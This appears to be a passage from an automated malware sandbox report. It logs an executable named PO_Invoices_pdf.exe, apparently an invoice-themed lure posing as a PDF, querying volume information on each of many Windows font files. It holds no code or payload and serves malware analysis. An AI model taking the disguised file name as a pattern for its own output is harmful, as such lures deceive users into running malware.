Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                            Source: C:\Users\user\Desktop\PO_Invoices_pdf.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
